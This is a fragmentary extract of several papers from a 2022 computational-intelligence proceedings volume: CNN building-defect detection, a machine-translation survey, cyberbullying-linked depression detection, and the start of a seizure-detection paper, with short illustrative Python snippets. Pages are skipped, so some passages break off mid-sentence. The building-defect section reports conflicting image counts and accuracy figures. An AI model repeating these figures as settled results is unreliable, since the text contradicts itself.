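The dropout step described above can be sketched in plain Python ("inverted" dropout, a common formulation; the 1/(1 − p) scaling is an assumption, since the text does not specify it):

```python
import random

def dropout(activations, p, training=True, rng=random):
    """Zero each unit with probability p; scale survivors so the expected
    activation is unchanged (inverted dropout). At test time, pass through."""
    if not training or p == 0.0:
        return list(activations)
    keep = 1.0 - p
    return [a / keep if rng.random() < keep else 0.0 for a in activations]

# With p = 0.5, each surviving unit is scaled by 2.0
layer = dropout([1.0] * 8, p=0.5, rng=random.Random(0))
```

Because a different random subset of neurons is silenced on every forward pass, no single neuron can co-adapt to specific others, which is why dropout acts as a regularizer.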
The input size of an image would be 227 × 227 × 3 due to padding. The accuracy obtained through this AlexNet model is comparatively poor; hence, another model was deployed to improve the detection rate. The objective of the research is to devise a model based on deep learning techniques to automate the maintenance process. The major objective of this research, therefore, is to investigate the novel application of the deep learning method of convolutional neural networks (CNNs) to automating the condition assessment of buildings. The focus is to automate the detection and localization, from images, of key defects arising from dampness in buildings. This paper starts with a brief overview of the related works focused on various techniques. The next section covers the scope of the work, followed by the proposed methodology. Experimental analysis and results are discussed in the next section. The last section provides the conclusion and future enhancement.
2 Literature Survey
CNN techniques are widely used for image processing, and the objective of this algorithm is to predict the various building defects.
Qu et al. [7] proposed a model for crack detection using a CNN, using VGG16 to optimize the model to extract the characteristic features of cracks. Qu et al. also developed a crack-detection model based on the LeNet-5 network and mentioned that, by training this model, accurate identification of cracks in concrete pavements under various characteristic types of disturbance was achieved. The paper concluded that, to upgrade the effectiveness of crack detection, Qu et al. would use the YOLO v3 series to improve the detection rate. But LeNet-5 is not capable enough, as only cracks were used for detection.
3 Scope of Work
The work has mainly focused on detecting building defects, and surveys related to this have been conducted. Based on the literature survey, many models have been deployed in existing systems to detect the defects of a building. However, the existing approaches are not very capable of detecting the defects. To detect building defects, we have deployed models based on AlexNet and ResNet50, which detect defects more accurately than the existing approaches. The combination of the CNN deep learning architecture and the ResNet50 image visualization technique has been implemented here to augment the accuracy.
4 Proposed Algorithm
The proposed system, shown in Fig. 4, aims to detect the defects in a building, which will reduce manual human checking. Whenever there is a defect, i.e., a spall or crack in the building, the user needs to capture the defect and send the images from the place where they live. It has been inferred from various works that the deployment of CNNs can solve various issues in computer vision. The main advantage of deploying a CNN in this work is that the detection of cracks is easier without human intervention. Among the architectures, we have applied ResNet50 to determine the defect types.
Algorithm
Step 1—START.
Step 2—Select an image as input to the model.
Step 3—Image processing will be done by using different layers.
Step 3a—Initially import the package Sequential so that all the packages will be
sequentially imported.
Step 3b—Then, image processing will be done using the package Convolution2D
to extract the features of the image. Then, the activation function—ReLU is used to
activate the neurons.
Step 3c—In the next step, the image pooling will be done using the package
MaxPooling2D. Here, the feature map is generated when the image is pooled.
Step 3d—The generated feature map will be converted into a 1-dimensional vector using the package Flatten.
Step 4—The model will be added into the dense layer where three layers will be
present in it, i.e., input layer, hidden layer, output layer sequentially.
Step 5—Training and testing of the model by generating our data using the package
ImageDataGenerator.
Step 6—Compiling the model using an optimizer.
Step 7—Importing the package ResNet50.
Step 8—Again training and testing the model.
Step 9—Connecting our model to the Flask, to access the Web application.
Step 10—END.
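Steps 3–6 of the algorithm above can be sketched with Keras (assuming TensorFlow is installed; the layer sizes and the four-class output are illustrative assumptions, not the exact configuration used in this work):

```python
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import Conv2D, MaxPooling2D, Flatten, Dense

model = Sequential([
    # Step 3b: convolution + ReLU extracts features from the input image
    Conv2D(32, (3, 3), activation="relu", input_shape=(224, 224, 3)),
    # Step 3c: max pooling downsamples the feature map
    MaxPooling2D(pool_size=(2, 2)),
    # Step 3d: flatten the feature map to one dimension
    Flatten(),
    # Step 4: dense layers ending in one output per defect class
    Dense(128, activation="relu"),
    Dense(4, activation="softmax"),  # spall, flake, crack, mold (assumed order)
])
# Step 6: compile the model with an optimizer
model.compile(optimizer="adam", loss="categorical_crossentropy",
              metrics=["accuracy"])
```

Training (Step 5) would then call `model.fit` on batches produced by `ImageDataGenerator`, and Step 7 onward swaps the feature extractor for ResNet50.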
4.1 Method
A significant feature of CNNs is properties like dimensionality reduction and the reduction in parameters. Computation is decreased due to parameter sharing. Additionally, the learning acquired in one part of the image is utilized in other parts of the image. Dimensionality reduction plays a vital role in reducing the computational power required. These are the reasons that contributed to the deployment of a CNN for detecting defects in the building.
In this work, initially, the model processes the image by using the various functions
in Keras like Sequential, Dense, Convolution2D, MaxPooling2D, and Flatten. The
detailed role of each function is given below.
Sequential—This function stacks the network layers sequentially from the input image to the predicted output.
5 Experimental Analysis
A. Implementation
In this work, Python has been used in the Jupyter Notebook and Spyder applications. HTML is used in the Spyder application to create a Web page using Flask. In this model, evaluation is done on a separate set of 455 images in the training dataset and 146 images in the test dataset. Initially, the AlexNet model is deployed and evaluated. The confusion matrix obtained is shown in Fig. 7. In Fig. 8, the classification report is used to determine metrics such as precision, recall, and F1-score.
Train loss versus validation loss and train accuracy versus validation accuracy are shown in Fig. 9. From Fig. 9, it has been observed that the validation accuracy is less than the training accuracy; possible reasons include the small validation set and the unbalanced dataset. To improve the accuracy and reduce the loss, ResNet50 has been deployed. The evaluation test showed a consistent overall accuracy of 81% (Fig. 10), and 90% of images were correctly classified.
In this model, we initially applied deep learning techniques and trained our model. Then, we loaded this model into the ResNet50 implementation and trained the model again. Figure 10 shows the accuracy when the ResNet50 model was implemented. The model has also been evaluated on various performance metrics, such as precision, recall, and F1-score; Fig. 11 shows the metrics for the deployed model. We saved our model and loaded it again in the Flask implementation, which is used to develop a Web application.
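The precision, recall, and F1-score reported in Fig. 11 follow directly from confusion-matrix counts; a minimal sketch (the counts below are hypothetical, not taken from the paper's results):

```python
def precision_recall_f1(tp, fp, fn):
    """Compute the three metrics from true/false positive and false negative counts."""
    precision = tp / (tp + fp)       # of predicted defects, how many were real
    recall = tp / (tp + fn)          # of real defects, how many were found
    f1 = 2 * precision * recall / (precision + recall)
    return precision, recall, f1

# Hypothetical counts for one defect class
p, r, f = precision_recall_f1(tp=80, fp=20, fn=20)   # -> 0.8, 0.8, 0.8
```

In a multi-class setting such as this one (spall, flake, crack, mold), these values are computed per class from the confusion matrix and then averaged.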
Fig. 11 Metrics
5.1 Results
5.2 Discussion
This work addresses a predominant issue faced by clients. As the detection of defects in a building is a complicated task, detection has been done with the deployment of deep learning algorithms. These defects occur mainly in high-rise buildings, and the main defects were cracks, spalls, and flakes. These defects are caused by (1) moisture problems of the environment, such as wind, temperature, and rain, (2) improper quality in the standards of building construction, (3) walls showing discoloration like a brown or yellow tainted stain, (4) improper ventilation, which may also lead to building defects in walls, ceilings, floors, and roofs, and (5) damage to the foundation. Some examples of building defects are leaks
6 Conclusion
This work mainly focused on the detection of types of defects in buildings. Automated detection of cracks has been done through the deployment of ResNet50. This classification problem takes images of size 224 × 224 × 3 as its dataset. In this work, 555 images have been considered for training and 176 images for the test dataset. The model was run for 25 epochs, and the accuracy recorded is 81% with 0.02 loss on the training set and 83% validation accuracy with 0.01 loss. The overall performance of this work showed reliability and flexibility in the classification of the type of defects. This work mainly focuses on four defects, namely cracks, flakes, spalls, and molds. This work has various limitations in the dataset, since it possesses only images with visible defects. Additionally, the images taken into consideration could have various backgrounds, and the edges should be made clear. The model could be enhanced in such a way that it is capable of providing good results.
Tools and Techniques for Machine Translation
Abstract Machine translation has been a subject of exploration for many years, and a great deal of notable work has been done in this field. Machine translation attracted serious speculation long before there were computers to apply to it. This paper presents the different approaches, techniques, and algorithms used for machine translation. Challenges of ambiguity in machine translation are also discussed. The paper further outlines the success reported by the various approaches, along with the challenges they face.
1 Introduction
Language is a phenomenon that joins different societies and a means of conveying the emotions and thoughts that individuals attempt to pass on. Translation plays a critical role in moving cultural ideas between two or more languages, and there are barriers and difficulties that translators face in this process. Since translation plays a significant role in removing the barriers created by different societies and enabling communication, it is one of the essential keys to transferring culture. A good translator should simultaneously know the social elements, perspectives, and conventions involved, so as to consciously consider the sequential order, expressed meaning, development of related disciplines, and historical and religious background of the source text.

Machine translation has been attempted in multiple ways by linguists. The approaches can be viewed from various angles, such as the technology involved, the approaches adopted, the techniques used, and the languages attempted, to name a
© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 857
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_69
858 A. S. Maurya et al.
few. Further, the translated text can be judged on the basis of various parameters, discussed below.
a. Translation speed—This is determined by the response time of the translated text.
b. Digital content—This is determined by the quality of translated audio and video content across different devices.
c. Cross-platform—This is determined by the adaptability of the translation technology across different platforms and media.
d. Translation quality—This is determined by the quality and accuracy of the translation.
e. MT approaches—This is determined by the efficiency of the approaches that can be applied for quality translations.
f. Cost—This is determined by the cost incurred for translation between the source and target languages.
The paper outlines different translation approaches in Sect. 2. Section 3 covers the different tools developed for machine translation. Section 4 discusses algorithms used for machine translation, and Sect. 5 addresses ambiguity issues in machine translation.
Statistical machine translation (SMT) quality depends on the size of the training corpora and the linguistic resources used (tools, dictionaries, etc.). Translation quality also depends on the language pair. SMT comprises major components such as the dictionary, training sets, decoding, and testing, as shown in Fig. 3. The process has reported eighty-seven percent accuracy [2]. The open-source software Moses can automatically train a translation model for any language pair and requires only a collection of translated text to do so.
In neural machine translation, the source text is encoded into a set of features by one neural network, and another neural network decodes them. Each word depends on its surrounding words, and recurrent neural networks are used to handle this, as shown in Fig. 4. The network remembers
Tools and Techniques for Machine Translation 861
previous words. Neural machine translation has shown remarkable success in reducing word-order, lexical, and grammar mistakes [3–5]. Further, open-source ecosystems for neural machine translation provide implementations on top of deep learning frameworks [3, 4].
The phrase dependency tree bank (PDT) [6] has flat structures, and its dependencies are based on semantics rather than syntactic functions, which makes it different from binary branching. Binary branching follows mainstream dependency analysis.
An automatic post-editing tool [7] has been proposed for automatically suggesting word replacements in machine translation output. This approach uses a technique based on bilingual word embeddings. The effectiveness of the tool is shown for two lexical errors: 'not translated word' and 'incorrectly translated word.'
A partial dependency parser for the Irish language has been proposed, which uses Constraint Grammar (CG) rules. The CG rules are used to annotate dependency relations and grammatical functions in unrestricted Irish text. Chunking is performed using a regular-expression grammar that operates on the dependency-tagged sentences. The system reports an F-score of ninety-three percent on development data and ninety-four percent on unseen test data, while the chunker achieves an F-score of ninety-seven percent on development data and ninety-three percent on unseen test data [8].
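A regular-expression grammar over POS tags, in the spirit of the chunker described above, can be sketched in miniature (the tag set and the noun-phrase pattern here are simplified inventions, not the actual CG-based Irish system):

```python
import re

def np_chunks(tagged):
    """Group (word, tag) pairs into noun-phrase chunks using a regex
    over the tag sequence: optional determiner, adjectives, then a noun."""
    tags = " ".join(t for _, t in tagged) + " "
    chunks = []
    for m in re.finditer(r"(DET )?(ADJ )*NOUN ", tags):
        start = tags[:m.start()].count(" ")   # token index of match start
        end = start + m.group(0).count(" ")   # one space per matched token
        chunks.append(" ".join(w for w, _ in tagged[start:end]))
    return chunks

sent = [("the", "DET"), ("old", "ADJ"), ("parser", "NOUN"),
        ("tags", "VERB"), ("sentences", "NOUN")]
print(np_chunks(sent))  # ['the old parser', 'sentences']
```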
Another paper proposes an extension of Sanskrit text to Universal Networking Language expressions named 'SANSUNL.' POS tagging, Sanskrit language processing, and parsing were enhanced. Further, 23 prefixes and 774 suffixes, together with the grammar rules of a Sanskrit stemmer, are used for stemming Sanskrit sentences in the proposed system. An efficiency of ninety-five percent, evaluated on BLEU and fluency score metrics, was reported [9].
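The longest-match suffix stripping that a stemmer of this kind performs can be sketched generically. The suffix list below is a tiny invented example; the actual system uses 23 prefixes, 774 suffixes, and Sanskrit grammar rules:

```python
def strip_suffix(word, suffixes):
    """Remove the longest matching suffix, if any (longest-match-first),
    keeping at least one character of the stem."""
    for s in sorted(suffixes, key=len, reverse=True):
        if word.endswith(s) and len(word) > len(s):
            return word[:-len(s)]
    return word

# Illustrative English-like suffixes; a Sanskrit stemmer uses its own list.
SUFFIXES = ["ations", "ation", "ing", "s"]
print(strip_suffix("translations", SUFFIXES))  # transl
print(strip_suffix("parsing", SUFFIXES))       # pars
```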
Machine translation has also been studied in terms of the algorithms used, and a significant amount of success in translation quality has been reported, as discussed below.
a. Error Analysis of SaHiT—a statistical Sanskrit-Hindi translator—analyzes errors of a Sanskrit-to-Hindi MT system that uses a statistical approach. The corpus was built and trained using the MTHub platform. From the error reports generated by the MTHub system during two training phases, a BLEU score of forty-one percent was reported [15].
b. A machine translation system for translating English to Sanskrit, 'EtranS,' was proposed to improve translation quality. Two modules were developed: (a) the parser module is responsible for parsing, i.e., generating tokens and performing grammatical and syntax analysis; (b) the generator module uses semantic information for mapping, and results are generated on the basis of this mapping. The system reported an accuracy of ninety percent for small, large, and extra-large sentences, and considers simple and compound sentences [1].
Another machine translation system for English to Sanskrit develops four modules: a lexical parser, a semantic mapper, a translator, and a composer. The lexical parser provides POS tag information. Three kinds of rules are generated: equality rules, synonym rules, and antonym rules. After parsing, when tokens have been generated and dependency relations between tokens have been found, a tree is generated and mapping is performed between the English and Sanskrit sentences [16].
Morphological analysis along with lexical analysis has also been reported, with a designed rule format. Here, the root word and its meaning are identified with the help of a lexical analyzer [17].
A parsing technique based on lexical functional grammar (LFG) has been reported for Sanskrit text. LFG works on two basic types of syntactic representation: (a) constituent structure and (b) functional structure. The LFG approach is used to bridge the gap between Sanskrit and English, as the two languages have different representations: for instance, English is subject-verb-object (SVO), while Sanskrit is subject-object-verb (SOV). The objective is to develop a parsing technique; the system considers simple sentences [18].
set data. Further, the list is used on the testing-set data for disambiguation of ambiguous words; the performance of the system is reported to be encouraging [29]. A hybrid training method has been used to obtain better performance than either the supervised or the unsupervised approach alone: the unsupervised method gives sixty-three percent accuracy, the supervised method seventy-six percent, and the hybrid method eighty percent. It is therefore concluded that accuracy is improved by the hybrid approach [30].
A Naïve Bayesian supervised learning approach with rich features has also been reported. Here, a forward sequential selection algorithm is used to choose the best set of features, and high accuracy is reported [31]. A novel context-clustering algorithm has been presented in the Bayesian framework, based on the similarities between context pairs. A maximum entropy model is then trained to represent the probability distribution of context-pair similarities based on heterogeneous features; the approach reports significantly high performance among unsupervised approaches, challenging supervised WSD systems [32, 33].
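A minimal version of the Naïve Bayes WSD approach described above, with add-one smoothing over context words, might look as follows (the training examples for the ambiguous word 'bank' are invented for illustration):

```python
from collections import Counter, defaultdict
import math

def train_nb(examples):
    """examples: list of (context_words, sense). Returns class priors and
    per-sense word counts for a multinomial Naive Bayes WSD model."""
    priors, counts = Counter(), defaultdict(Counter)
    for words, sense in examples:
        priors[sense] += 1
        counts[sense].update(words)
    return priors, counts

def predict(words, priors, counts, vocab_size):
    def score(sense):
        total = sum(counts[sense].values())
        s = math.log(priors[sense])
        for w in words:  # add-one (Laplace) smoothing
            s += math.log((counts[sense][w] + 1) / (total + vocab_size))
        return s
    return max(priors, key=score)

# Invented training data for the ambiguous word 'bank'
data = [(["river", "water"], "shore"), (["money", "loan"], "finance"),
        (["water", "fish"], "shore"), (["loan", "interest"], "finance")]
priors, counts = train_nb(data)
vocab = {w for ws, _ in data for w in ws}
print(predict(["river", "fish"], priors, counts, len(vocab)))  # shore
```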
6 Conclusion
Acknowledgements The authors would like to thank the Council of Science & Technology, UP, for providing funding under the Adhoc-Research Scheme/Transfer of Technology Scheme with reference no. CST/D 2475.
References
1. Bahadur, P., Jain, A. K., & Chauhan, D. S. (2012). EtranS—A complete framework for English to Sanskrit machine translation. International Journal of Advanced Computer Science and Applications (IJACSA), Special Issue on Selected Papers from International Conference & Workshop on Emerging Trends in Technology. https://doi.org/10.14569/SpecialIssue.2012.020107
2. Sreelekha, S., Bhattacharyya, P., & Malathi, D. (2018, January). Statistical versus rule-based
machine translation: A comparative study on Indian languages. In International Conference
on Intelligent Computing and Applications.
3. Ott, M., Edunov, S., Grangier, D., & Auli, M. (2018). Scaling neural machine translation. arXiv:1806.00187
4. Hoang, C. D. V., Koehn, P., Haffari, G., & Cohn, T. (2018). Iterative back-translation for neural machine translation. In Proceedings of the 2nd Workshop on Neural Machine Translation and Generation, Melbourne, Australia (pp. 18–24). Association for Computational Linguistics.
5. Johnson, M., Schuster, M., Le, Q. V., Krikun, M., Wu, Y., Chen, Z., Thorat, N., Viégas, F.,
Wattenberg, M., Corrado, G., Hughes, M., & Dean, J. (2017) Google’s multilingual neural
machine translation system: Enabling zero-shot translation.
6. Cao, J.-X., Huang, D.-G., Wang, W., & Wang, S.-J. (2014). Dalian Ligong Daxue
Xuebao/Journal of Dalian University of Technology, 54(1), 91–99.
7. Inácio, M. L., & Caseli, H. (2020). Word embeddings at post-editing. In Computational Processing of the Portuguese Language: 14th International Conference, PROPOR 2020, Evora, Portugal, March 2–4, Proceedings.
8. Dhonnchadha, E. U., & Genabith, J. V. (2010). Partial dependency parsing for Irish. Centre for Language and Communication Studies, Trinity College, Dublin; Centre for Next Generation Localisation, Dublin City University, Glasnevin, Dublin.
9. Sitender, & Bawa, S. (2020). Sanskrit to universal networking language EnConverter system based on deep learning and context-free grammar. Multimedia Systems.
10. López-Pereira, A. (2019, December). Neural machine translation and statistical machine
translation: Perception and productivity, Revista Tradumàtica.
11. Attri, S. H., Prasad, T. V., & Ramakrishna, G. (2020). HiPHET: Hybrid approach for translating mixed code language (Hinglish) to pure languages (Hindi and English). Computer Science, 21(3). https://doi.org/10.7494/csci.2020.21.3.3624
12. Zhang, Y., & Liu, G. (2020). Paragraph-parallel based neural machine translation model with hierarchical attention. Journal of Physics: Conference Series, 1453, 012006.
13. Sadler, D. A. L. (1992). Noun-modifying adjectives in HPSG. Department of Language and Linguistics, University of Essex, Wivenhoe Park, Colchester, UK.
14. Klein, G., Kim, Y., Deng, Y., Senellart, J., & Rush, A. M. (2017). OpenNMT: Open-source toolkit for neural machine translation. arXiv:1701.02810
15. Pandey, & Jha (2016). Error analysis of SaHiT—A statistical Sanskrit-Hindi translator.
16. Barkade et al. (2010). English to Sanskrit machine translation semantic mapper.
17. Tapaswi, & Jain (2011). Morphological and lexical analysis of the Sanskrit sentences.
18. Tapaswi et al. (2012). Parsing Sanskrit sentences using lexical functional grammar.
19. Sekharaiah, K. C., Gopal, U., & Khan, M. A. M. (2006). Obstacles to machine translation.
20. Tapaswi et al. (2011). Morphological and lexical analysis of the Sanskrit sentences.
21. Borah, P. P., Talukdar, G., & Baruah, A. (2019). WSD for Assamese Language.
22. Singh, V. P., & Kumar, P. (2018). Naive Bayes classifier for word sense disambiguation of
Punjabi language.
23. Sheth, M., Popat, S., & Vyas, T. (2018). Word sense disambiguation for Indian Languages
24. Shashank, N. S., Kallimani, J. S. (2017). Word sense disambiguation of polysemy words in
Kannada language.
25. Zankhana, B., & Vaishnav (2017). Gujarati word sense disambiguation using genetic algorithm.
26. Sruthi Sankar, K. P., Raghu Raj, P. C., & Jayan, V. (2016). Unsupervised approach to word
sense disambiguation in Malayalam.
27. Pal, A. R., Saha, D., Naskar, S., & Sekhar, N. (2015). Dash, word sense disambiguation in
Bengali: A lemmatized system increases the accuracy of the result.
28. Anand Kumar, M., Rajendran, S., & Soman, K. P. (2014). Tamil word sense disambiguation
using support vector machines with rich features.
29. Parameswarappa, S., & Narayan, V. N. (2013). Kannada word sense disambiguation using
decision list.
30. Saktel, P., & Shrawankar, U. (2012). An improved approach for word ambiguity removal.
31. Le, C. A., & Shimazu, A. (2004). High WSD accuracy using Naive Bayesian classifier with
rich features.
32. Niu, C., Li, W., Srihari, R. K., Li, H., & Crist, L. (2004). Context clustering for word sense
disambiguation based on modeling pairwise context similarities.
33. Le, N.-B., Dao, X.-Q., & Nguyen Thi, M.-T. (2021). Design of text and voice machine translation tool for presentations. In 13th Asian Conference on Intelligent Information and Database Systems, Phuket, Thailand.
Cyberbullying-Mediated Depression Detection in Social Media Using Machine Learning
Abstract Mental distress is one of the most paramount causes of disability worldwide. People using social media at an exponential rate become prey to cyberbullying victimization, eventually leading to mental health problems. This study assessed the association of social media, cyberbullying, and mental depression via supervised learning techniques. In this work, learning techniques, namely support vector machines, random forests, Naïve Bayes, multilayer perceptron, convolutional neural network, and recurrent neural network, have been applied to data taken from Twitter and Reddit for predicting cyberbullying-mediated depression. Higher accuracy is observed with deep learning than with baseline machine learning. Also, among the applied classical machine learning techniques, random forests reported the highest accuracy.
1 Introduction
© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 869
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_70
870 A. Kumar and N. Sachdeva
as losing a job, lack of friends, strict parents, online trolling, cyberbullying (CB), or other related issues. Even so, with technological advancements, people are spending more time on social media than quality time with their friends and family members. People suffering from mental distress [2] and other depressive disorders generally use social media (SM) (such as Twitter, Reddit, and Facebook) to share personal experiences, vent their feelings, and hear from other people who have similar issues. Mental distress is mainly related to emotional stress, social anxiety, depressive symptoms, suicidal ideation, suicide attempts, etc. CB [3–5] is a rising public health concern that has been linked to multiple serious negative consequences, including depression, anxiety, and insomnia. Observing mental distress on SM already has serious public health implications, but when combined with CB victimization, the impact can be exacerbated. Motivated by this, in this paper we focus on observing signs of depression on SM (namely Twitter and Reddit) using supervised learning techniques: support vector machines (SVM), Naïve Bayes (NB), random forests (RF), multilayer perceptron (MLP), recurrent neural network (RNN), and convolutional neural network (CNN). Term frequency–inverse document frequency (TF-IDF) and Word2Vec were used for feature selection for the ML techniques, whereas word embeddings [4] were used for word feature vectorization for the DL techniques. We therefore felt that a binary classification (CB-mediated depression versus non-CB-mediated depression) could be effectively conducted by analyzing texts written on SM (real-time user-generated data) by people at risk of or suffering from mental illnesses (particularly depression due to CB).
Thus, the main contribution of this research is given below:
• Implementation of supervised ML and DL techniques for comparative analysis of CB-mediated and non-CB-mediated depression detection (NB, SVM, MLP, and RF using TF-IDF and Word2Vec; CNN, RNN, and Conv-RNN using GloVe), evaluated using accuracy, precision, and recall on data obtained from SM, namely Twitter and Reddit.
The rest of the paper is organized as follows. The second section briefly discusses related work, followed by the application of supervised learning for CB detection, a discussion of results, and finally the conclusion and future work in the last sections.
This section summarizes studies related to mental distress owing to CB victimization on SM. Cenat et al. [6] studied CB and its serious consequences for teenagers (depression, anxiety, suicide, loneliness). Logistic regression was used to predict mental distress, low self-esteem, etc., from CB victimization; results showed that girls had a higher prevalence of CB. Nandhini et al. [7] proposed a CB detection system that identified and classified flaming, harassment, etc., using the Levenshtein algorithm and NB. Enhanced results were obtained for CB detection and classification using
Cyberbullying-Mediated Depression Detection … 871
an information retrieval algorithm. Nandhini et al. [8] proposed a system with enhanced accuracy for classifying harassment, racism, flaming, and terrorism using fuzzy logic and genetic algorithms on data taken from Myspace and Formspring.com. Frommholz et al. [9] proposed a framework for identifying cyberstalking and harassment using ML techniques, with good results. Radovic et al. [10] examined the role of SM in adolescent depression caused by CB, etc., by conducting interviews for content analysis. Torous et al. [11] reviewed current approaches to suicide prevention using smartphones, sensors, and ML techniques. Viner et al. [2] studied the association of SM with mental distress and related consequences (CB, etc.) among young people in England through content analysis of questionnaire scores. Talpur et al. [12] proposed a framework with improved accuracy for CB detection using PMI and ML techniques, namely NB, kNN, SVM, RF, etc.
This section discusses the dataset used and the system architecture.
In our study, we catered to topics related to depression owing to CB. We also found that various established depression datasets are available online. However, those datasets focus on posts about depression and mental distress caused by several factors such as lack of a job, family issues, monetary aspects, and birth defects. This led us to synthesize our own dataset, focused primarily on mental depression caused by CB. Hence, we collected data from Twitter and Reddit using the keywords 'depression' and 'mental distress.' We collected around 20,000 samples, which were then preprocessed. Data preprocessing removed NaN values, blank lines, punctuation, numbers, extra spaces, and stop words, and stemming was performed, leaving 19,731 samples. We then manually annotated the data to study CB-indicative symptoms and classified the dataset into two classes: CB-mediated depression (CBMD) and non-CB-mediated depression (N-CBMD). We observed that approximately 18% of the data contained CB-mediated depression, which made our corpus skewed (imbalanced): CBMD contained 3551 samples and N-CBMD contained 16,180 samples. The former category is the minority class (fewer samples), whereas the latter is the majority class (more samples). One way of solving the imbalanced-class problem is to change the
class distribution in the training data by over-sampling the minority class or under-sampling the majority class. To handle the data skewness, we therefore incorporated the 'RandomOverSampler (ROS).'
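Random over-sampling of the kind ROS performs can be sketched in plain Python; a library implementation such as imbalanced-learn's RandomOverSampler would be used in practice, so this only shows the idea:

```python
import random

def random_oversample(samples, labels, seed=42):
    """Duplicate minority-class samples at random until classes balance."""
    rng = random.Random(seed)
    by_class = {}
    for s, y in zip(samples, labels):
        by_class.setdefault(y, []).append(s)
    target = max(len(v) for v in by_class.values())
    out = []
    for y, items in by_class.items():
        extra = [rng.choice(items) for _ in range(target - len(items))]
        out += [(s, y) for s in items + extra]
    return out

data = ["a", "b", "c", "d", "e"]
labels = ["maj", "maj", "maj", "maj", "min"]
balanced = random_oversample(data, labels)
counts = {y: sum(1 for _, l in balanced if l == y) for y in set(labels)}
print(counts)  # both classes now have 4 samples
```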
Figure 1 shows the word cloud built from the collected data.
The system architecture is shown in Fig. 2. The first phase was data collection and preprocessing. Next, feature selection was carried out using TF-IDF [3, 5] and Word2Vec [13] to create word feature vectors, which were then fed to the supervised machine learning techniques [14, 15] (SVM, NB, RF, MLP); GloVe [4] embeddings were used for the RNN and CNN [4, 16–20] for further classification. Here, 80% of the data was used for training and the remaining 20% for testing.
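The TF-IDF feature path above can be illustrated from scratch; the tiny two-document corpus is invented, and real experiments would use a library vectorizer:

```python
import math
from collections import Counter

def tfidf(docs):
    """Return one {term: tf*idf} dict per tokenized document,
    with tf = count/doc_length and idf = log(N / document_frequency)."""
    n = len(docs)
    df = Counter(t for d in docs for t in set(d))
    vectors = []
    for d in docs:
        tf = Counter(d)
        vectors.append({t: (c / len(d)) * math.log(n / df[t])
                        for t, c in tf.items()})
    return vectors

docs = [["sad", "alone", "sad"], ["happy", "alone"]]
v = tfidf(docs)
# 'sad' appears only in doc 0, so it gets a positive weight there;
# 'alone' appears in both docs, so its idf (and weight) is 0.
```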
In this section, we present the comparative result analysis for CB detection using precision (P), accuracy (A), and recall (R) [5], all expressed as percentages. All experiments were performed using tenfold cross-validation.
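The tenfold protocol just mentioned can be sketched as a plain index-splitting routine (illustrative only; a library utility such as scikit-learn's KFold would normally be used):

```python
def k_fold_indices(n_samples, k=10):
    """Yield (train_idx, test_idx) pairs for k-fold cross-validation."""
    idx = list(range(n_samples))
    fold = n_samples // k
    for i in range(k):
        start = i * fold
        # the last fold absorbs any remainder
        end = n_samples if i == k - 1 else start + fold
        test = idx[start:end]
        train = idx[:start] + idx[end:]
        yield train, test

folds = list(k_fold_indices(25, k=5))
print(len(folds), len(folds[0][1]), len(folds[-1][1]))  # 5 5 5
```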
Table 1 shows the results obtained: RF yielded the highest A, around 93.4%, followed by NB and then MLP; the lowest A was obtained with SVM.
Table 2 shows similar results: RF again yielded the highest A, around 90.36%, followed by NB and then MLP, with the lowest A obtained using SVM. Hence, we can infer that better prediction A was obtained using TF-IDF than using Word2Vec.
Among all, RF with ROS demonstrated the best performance in binary classification under a class-imbalanced distribution. Feature generation with ROS at the preprocessing stage proved to be an effective way of handling class imbalance.
Table 3 shows the results obtained by applying RNN, CNN, and the hybrid Conv-RNN (with ROS before training) using GloVe [4].
From Table 3, it is observed that the hybrid Conv-RNN yielded the highest accuracy, around 96%, followed by CNN (95%) and RNN (94%). Among the applied classical ML techniques, the highest accuracy was reported with RF for binary classification. Our findings also show that the DL-based techniques outperformed the ML techniques applied to the same dataset for CBMD and N-CBMD detection (as depicted in Fig. 3).
5 Conclusion
Mental distress is a sensitive field that has attracted the attention of practitioners and researchers for decades. In this research, we performed a comparative analysis
of machine learning and deep learning techniques on the dataset we created from Twitter and Reddit, focused primarily on mentally depressed tweets and posts. From this dataset, we identified by manual annotation the samples that were depressive owing to CB victimization, with the other category being samples that were depressive for any other reason (binary classification: CBMD and N-CBMD). The resultant dataset was quite imbalanced, so we employed random over-sampling with feature generation at the preprocessing step, which proved to be a methodical technique for handling class imbalance in binary classification. We then applied various ML and DL techniques to the resulting dataset and obtained encouraging results. From the results obtained, we can conclude that DL produces higher accuracy than baseline supervised ML techniques for observing signs of depression (mental distress) caused by online bullying. From the dataset distribution, we can also observe that although CB is not the major cause of mental illness, it is indeed one of the most prominent reasons for mental depression on SM.
6 Future Trends
This work will be beneficial for netizens who often use social networking sites and are susceptible to mental illnesses. The problem is omnipresent, but particularly in countries like India, where having and discussing any mental distress is considered a taboo, the situation is worse: people do not discuss their mental state and are unwilling to seek help from professionals. In some cases, people are not even able to understand and accept their own mental illness. Thus, an implicit method for automatic detection is the need of the hour, one that aids in the heedful observation of indications of mental distress among users of social networking sites. Along the same lines, we intend to build a robust real-time method that can help netizens identify and analyze a depressed state of mind due to CB in an efficient way. This work could be augmented by implementing it as an Android application (for mobiles, tablets, etc.) that could connect users to doctors and professionals in the relevant field. This would eventually help depressed individuals discuss their state of mind, mental health problems, and other issues they have faced due to CB, and the application would be more useful if made available to the general public. The approach could also be tested in other domains, such as anxiety disorder detection. Further, other soft computing models (such as hierarchical attention networks and feature optimizations) could be applied for additional testing and analysis.
Improved Patient-Independent Seizure
Detection System Using Novel Feature
Extraction Techniques
© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 879
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_71
880 D. Nandini et al.
1 Introduction
Epilepsy is a neurological disease which severely impacts the lives of many patients.
At present, 65 million people worldwide are affected by this disease. An epileptic
seizure results in abnormal sensations that may range from the twitching of arms
to severe injuries and may even lead to death after strokes. Significant research
has been carried out to detect epilepsy using electroencephalogram (EEG) signals.
